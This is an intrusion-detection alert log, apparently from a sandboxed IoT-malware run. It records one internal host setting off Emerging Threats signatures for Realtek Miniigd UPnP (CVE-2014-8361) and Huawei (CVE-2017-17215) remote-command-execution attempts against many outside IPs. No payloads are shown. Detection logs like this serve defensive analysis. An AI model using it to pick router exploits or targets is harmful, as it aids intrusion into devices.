                                                07/20/24-23:07:08.060226TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616097052869192.168.2.14212.164.237.193
                                                07/20/24-23:06:00.756790TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24557252869192.168.2.1471.168.119.24
                                                07/20/24-23:06:23.209420TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4556052869192.168.2.14133.4.216.224
                                                07/20/24-23:06:02.463480TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5873652869192.168.2.1487.236.59.75
                                                07/20/24-23:06:03.123567TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4261652869192.168.2.14213.59.160.112
                                                07/20/24-23:06:10.010711TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613327452869192.168.2.1460.48.237.97
                                                07/20/24-23:05:59.443720TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4512652869192.168.2.14191.158.120.67
                                                07/20/24-23:07:36.969912TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3579252869192.168.2.1478.18.150.141
                                                07/20/24-23:05:42.271822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5928237215192.168.2.14197.150.152.219
                                                07/20/24-23:06:31.841865TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25689852869192.168.2.14165.146.142.120
                                                07/20/24-23:05:40.341196TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4760052869192.168.2.1459.16.3.2
                                                07/20/24-23:06:01.207185TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4198252869192.168.2.14148.3.120.99
                                                07/20/24-23:06:40.850874TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4786452869192.168.2.14132.28.34.172
                                                07/20/24-23:07:08.369781TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4377252869192.168.2.14133.103.255.70
                                                07/20/24-23:06:27.421231TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4292452869192.168.2.14178.190.0.107
                                                07/20/24-23:05:42.221844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4948437215192.168.2.1463.236.234.105
                                                07/20/24-23:05:57.974933TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24024252869192.168.2.14130.98.61.37
                                                07/20/24-23:05:59.257734TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24187852869192.168.2.14122.54.20.32
                                                07/20/24-23:06:08.143841TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24746252869192.168.2.144.132.221.115
                                                07/20/24-23:05:40.423413TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24081052869192.168.2.14178.152.7.43
                                                07/20/24-23:06:11.695372TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25847052869192.168.2.14162.196.84.240
                                                07/20/24-23:06:17.709098TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4406452869192.168.2.1459.45.228.144
                                                07/20/24-23:05:57.584377TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614471652869192.168.2.14196.190.254.156
                                                07/20/24-23:06:56.877705TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613982052869192.168.2.1443.154.190.50
                                                07/20/24-23:05:37.440253TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5190852869192.168.2.1451.156.205.139
                                                07/20/24-23:05:40.344189TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5697652869192.168.2.14100.187.132.120
                                                07/20/24-23:06:02.874908TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3383052869192.168.2.14223.138.154.84
                                                07/20/24-23:06:47.557250TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4062852869192.168.2.1443.154.190.50
                                                07/20/24-23:05:57.906796TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4477052869192.168.2.14166.28.205.27
                                                07/20/24-23:05:57.925983TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3610652869192.168.2.14204.111.195.125
                                                07/20/24-23:06:05.732595TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25343252869192.168.2.14199.125.41.58
                                                07/20/24-23:06:01.795331TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5829252869192.168.2.14208.101.156.156
                                                07/20/24-23:07:06.283235TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613948652869192.168.2.14146.238.26.98
                                                07/20/24-23:05:38.587931TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613749252869192.168.2.1465.34.121.12
                                                07/20/24-23:05:48.763322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4908837215192.168.2.1476.87.51.211
                                                07/20/24-23:06:17.614211TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5019252869192.168.2.1473.230.116.174
                                                07/20/24-23:05:40.326250TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4645652869192.168.2.1493.126.173.161
                                                07/20/24-23:06:10.782901TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25151852869192.168.2.1432.213.57.170
                                                07/20/24-23:05:36.323663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3492237215192.168.2.14157.3.23.49
                                                07/20/24-23:05:42.257816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3947237215192.168.2.1441.208.152.49
                                                07/20/24-23:06:00.209942TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23280852869192.168.2.1465.118.0.140
                                                07/20/24-23:05:37.464931TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5256452869192.168.2.1436.216.251.126
                                                07/20/24-23:06:16.535822TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613973252869192.168.2.14151.72.13.67
                                                07/20/24-23:05:35.916130TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614131052869192.168.2.142.163.63.233
                                                07/20/24-23:06:01.468942TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24906252869192.168.2.14190.39.69.46
                                                07/20/24-23:05:35.253230TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614843252869192.168.2.1451.192.83.103
                                                07/20/24-23:06:38.912153TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5592452869192.168.2.14167.193.31.8
                                                07/20/24-23:05:35.523772TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614261452869192.168.2.14145.82.197.86
                                                07/20/24-23:05:35.463271TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4223252869192.168.2.14154.64.178.0
                                                07/20/24-23:05:56.219051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5514237215192.168.2.1441.96.4.19
                                                07/20/24-23:07:36.644546TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615331852869192.168.2.14110.206.40.7
                                                07/20/24-23:05:36.323651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3781637215192.168.2.14209.16.9.12
                                                07/20/24-23:05:46.511430TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614782052869192.168.2.1420.25.130.127
                                                07/20/24-23:06:02.378063TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23758052869192.168.2.1434.212.103.117
                                                07/20/24-23:06:15.999787TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3403452869192.168.2.14150.121.79.74
                                                07/20/24-23:05:39.170455TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615629252869192.168.2.1424.106.113.180
                                                07/20/24-23:05:52.570834TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24214052869192.168.2.14210.22.195.78
                                                07/20/24-23:05:35.197096TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613662652869192.168.2.14184.192.255.233
                                                07/20/24-23:06:17.411596TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614270452869192.168.2.14154.10.111.3
                                                07/20/24-23:05:42.257476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4024037215192.168.2.14157.208.195.212
                                                07/20/24-23:05:39.047734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4243437215192.168.2.1441.84.125.43
                                                07/20/24-23:06:04.458817TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3333852869192.168.2.1457.243.186.230
                                                07/20/24-23:06:17.661736TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5502452869192.168.2.1443.231.212.180
                                                07/20/24-23:05:40.483611TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4529052869192.168.2.14110.4.207.154
                                                07/20/24-23:06:11.236923TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4317652869192.168.2.14105.141.150.128
                                                07/20/24-23:07:03.257276TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4552652869192.168.2.14122.129.207.148
                                                07/20/24-23:06:09.635095TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613972452869192.168.2.14168.151.156.87
                                                07/20/24-23:05:38.949221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4624637215192.168.2.1431.215.216.138
                                                07/20/24-23:06:01.219796TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6027652869192.168.2.145.117.210.100
                                                07/20/24-23:06:15.553063TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25127852869192.168.2.1465.82.221.155
                                                07/20/24-23:05:56.310476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4625237215192.168.2.1441.224.244.111
                                                07/20/24-23:05:40.326250TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4934852869192.168.2.1496.95.169.154
                                                07/20/24-23:05:36.339999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5478037215192.168.2.14131.26.31.236
                                                07/20/24-23:05:40.478948TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24236852869192.168.2.1467.132.246.110
                                                07/20/24-23:06:02.997058TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5766852869192.168.2.1470.37.111.197
                                                07/20/24-23:05:52.508651TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5084252869192.168.2.1469.202.5.98
                                                07/20/24-23:05:56.137269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5223837215192.168.2.1441.115.205.202
                                                07/20/24-23:05:59.348370TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5029852869192.168.2.1465.82.221.155
                                                07/20/24-23:05:36.327720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4443637215192.168.2.14197.235.65.47
                                                07/20/24-23:05:52.692606TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4608052869192.168.2.1466.147.118.218
                                                07/20/24-23:06:15.063003TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3724052869192.168.2.14164.79.126.181
                                                07/20/24-23:05:42.127943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4854637215192.168.2.14157.210.156.80
                                                07/20/24-23:05:57.549014TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615989452869192.168.2.14162.39.12.155
                                                07/20/24-23:05:39.615596TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614705652869192.168.2.14163.35.26.213
                                                07/20/24-23:05:52.575727TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5738852869192.168.2.14149.122.202.24
                                                07/20/24-23:06:00.005301TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4979852869192.168.2.14106.217.170.66
                                                07/20/24-23:05:42.131789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4453037215192.168.2.1441.165.59.46
                                                07/20/24-23:06:11.296188TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615922852869192.168.2.14104.196.102.71
                                                07/20/24-23:05:33.830838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4938837215192.168.2.14157.196.44.133
                                                07/20/24-23:06:13.770520TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3932252869192.168.2.1440.175.52.158
                                                07/20/24-23:05:38.765315TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614102652869192.168.2.1467.132.246.110
                                                07/20/24-23:05:45.094611TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4051052869192.168.2.1494.30.138.165
                                                07/20/24-23:05:58.794030TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3318052869192.168.2.14191.34.113.0
                                                07/20/24-23:06:22.218849TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25341852869192.168.2.14124.7.34.105
                                                07/20/24-23:05:46.515260TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5497652869192.168.2.14201.136.108.183
                                                07/20/24-23:06:05.846150TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25486652869192.168.2.1450.125.157.33
                                                07/20/24-23:05:37.468948TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3573252869192.168.2.1417.92.216.196
                                                07/20/24-23:05:56.900733TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3617052869192.168.2.14199.172.167.2
                                                07/20/24-23:07:36.617416TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4905852869192.168.2.1466.1.85.90
                                                07/20/24-23:05:34.661756TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4334437215192.168.2.1441.75.56.150
                                                07/20/24-23:05:48.756259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4954837215192.168.2.1441.98.76.105
                                                07/20/24-23:06:06.855214TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3401052869192.168.2.1436.129.152.48
                                                07/20/24-23:06:50.982145TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613542252869192.168.2.1417.87.247.147
                                                07/20/24-23:05:39.055909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4564037215192.168.2.1441.83.228.225
                                                07/20/24-23:05:40.455250TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24882252869192.168.2.1471.233.122.57
                                                07/20/24-23:06:03.945487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5907237215192.168.2.1441.110.244.5
                                                07/20/24-23:05:37.517011TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25711652869192.168.2.1427.205.21.176
                                                07/20/24-23:05:58.950772TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613301652869192.168.2.1470.214.171.113
                                                07/20/24-23:06:06.638799TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5455852869192.168.2.14211.118.237.168
                                                07/20/24-23:06:02.949715TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614515252869192.168.2.1434.151.91.57
                                                07/20/24-23:06:13.684507TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614486452869192.168.2.14137.55.138.211
                                                07/20/24-23:06:25.686672TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24583252869192.168.2.14133.4.216.224
                                                07/20/24-23:05:37.442743TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25302252869192.168.2.14154.57.81.200
                                                07/20/24-23:06:01.285913TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614948852869192.168.2.1412.150.40.173
                                                07/20/24-23:05:34.619289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3684837215192.168.2.14164.152.114.92
                                                07/20/24-23:05:57.204945TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613504852869192.168.2.1459.29.225.212
                                                07/20/24-23:05:58.880153TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24008252869192.168.2.14128.134.241.5
                                                07/20/24-23:05:58.417625TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5243652869192.168.2.14217.8.249.6
                                                07/20/24-23:05:56.998513TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615949652869192.168.2.1414.105.61.250
                                                07/20/24-23:05:57.963204TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615783252869192.168.2.14222.246.191.243
                                                07/20/24-23:05:58.929504TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3435252869192.168.2.1463.95.38.63
                                                07/20/24-23:05:33.852857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3562637215192.168.2.1475.49.195.139
                                                07/20/24-23:06:15.553063TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615857052869192.168.2.14221.88.192.249
                                                07/20/24-23:05:59.787018TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5079252869192.168.2.1481.224.30.46
                                                07/20/24-23:06:00.257590TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25765052869192.168.2.14144.12.181.130
                                                07/20/24-23:05:38.949221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3740637215192.168.2.14157.24.79.77
                                                07/20/24-23:05:52.514709TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5886852869192.168.2.14132.1.16.35
                                                07/20/24-23:05:56.048573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4369237215192.168.2.14157.31.102.66
                                                07/20/24-23:06:02.018794TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4206452869192.168.2.14161.224.19.168
                                                07/20/24-23:05:38.530661TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5831652869192.168.2.14157.254.149.171
                                                07/20/24-23:06:01.411873TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6094852869192.168.2.14204.221.55.53
                                                07/20/24-23:06:01.940214TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5189852869192.168.2.1468.40.46.225
                                                07/20/24-23:06:12.620447TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615329052869192.168.2.14140.187.97.113
                                                07/20/24-23:05:40.407056TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24570852869192.168.2.14121.164.80.162
                                                07/20/24-23:05:56.894939TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5570452869192.168.2.14155.244.161.196
                                                07/20/24-23:05:39.537505TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4225852869192.168.2.1473.20.147.180
                                                07/20/24-23:05:33.857328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5524637215192.168.2.14197.23.105.2
                                                07/20/24-23:05:48.756259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4890837215192.168.2.14133.238.127.11
                                                07/20/24-23:05:42.257476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4718237215192.168.2.14197.42.249.15
                                                07/20/24-23:06:13.097390TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5442052869192.168.2.14205.249.112.164
                                                07/20/24-23:06:17.555463TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4879252869192.168.2.1438.39.9.123
                                                07/20/24-23:05:45.386529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4492637215192.168.2.14197.58.188.133
                                                07/20/24-23:06:15.208037TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615378852869192.168.2.1449.182.189.186
                                                07/20/24-23:05:52.493809TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23302052869192.168.2.1445.52.160.244
                                                07/20/24-23:05:52.546679TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4950452869192.168.2.14131.30.152.0
                                                07/20/24-23:06:00.954677TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613592252869192.168.2.14199.208.79.51
                                                07/20/24-23:05:39.578201TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4865052869192.168.2.14165.39.41.234
                                                07/20/24-23:05:35.248418TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615367652869192.168.2.14121.248.9.74
                                                07/20/24-23:05:48.773442TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5325837215192.168.2.14166.197.40.110
                                                07/20/24-23:05:59.247850TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6062252869192.168.2.1442.106.20.3
                                                07/20/24-23:05:37.449834TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25808252869192.168.2.14148.195.201.170
                                                07/20/24-23:06:16.584797TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613552052869192.168.2.14147.197.189.218
                                                07/20/24-23:05:40.330643TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24826452869192.168.2.14200.224.172.161
                                                07/20/24-23:05:56.402098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5577837215192.168.2.14119.163.194.77
                                                07/20/24-23:05:33.830272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3594837215192.168.2.14157.153.42.4
                                                07/20/24-23:05:36.528872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3348437215192.168.2.14197.80.137.234
                                                07/20/24-23:05:38.939890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3392037215192.168.2.14197.134.96.74
                                                07/20/24-23:06:03.476247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6050437215192.168.2.14111.147.17.210
                                                07/20/24-23:06:54.322182TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5398452869192.168.2.14122.215.163.185
                                                07/20/24-23:05:57.544145TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25828652869192.168.2.1418.206.106.65
                                                07/20/24-23:05:59.080968TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23928852869192.168.2.1459.30.40.102
                                                07/20/24-23:07:01.742070TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5203252869192.168.2.14207.237.205.173
                                                07/20/24-23:05:57.558741TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4189052869192.168.2.14103.66.18.174
                                                07/20/24-23:06:51.995876TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25457052869192.168.2.14181.187.190.81
                                                07/20/24-23:06:07.030071TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5349252869192.168.2.145.141.246.151
                                                07/20/24-23:06:11.469684TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23928052869192.168.2.1413.13.248.159
                                                07/20/24-23:06:00.078168TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4377252869192.168.2.14187.88.165.50
                                                07/20/24-23:06:03.345104TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5091652869192.168.2.1452.30.74.250
                                                07/20/24-23:05:59.954496TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614542052869192.168.2.14169.204.117.167
                                                07/20/24-23:05:42.245589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4487237215192.168.2.14218.211.213.131
                                                07/20/24-23:06:35.070304TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24389652869192.168.2.14187.88.165.50
                                                07/20/24-23:06:00.536999TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3387252869192.168.2.14101.251.173.173
                                                07/20/24-23:05:35.479241TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615948452869192.168.2.14223.12.218.46
                                                07/20/24-23:05:45.403074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4561037215192.168.2.1441.16.89.154
                                                07/20/24-23:05:57.037609TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615864452869192.168.2.14107.22.142.143
                                                07/20/24-23:06:00.022949TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5865652869192.168.2.14175.185.115.85
                                                07/20/24-23:05:42.245742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3802637215192.168.2.14181.177.50.143
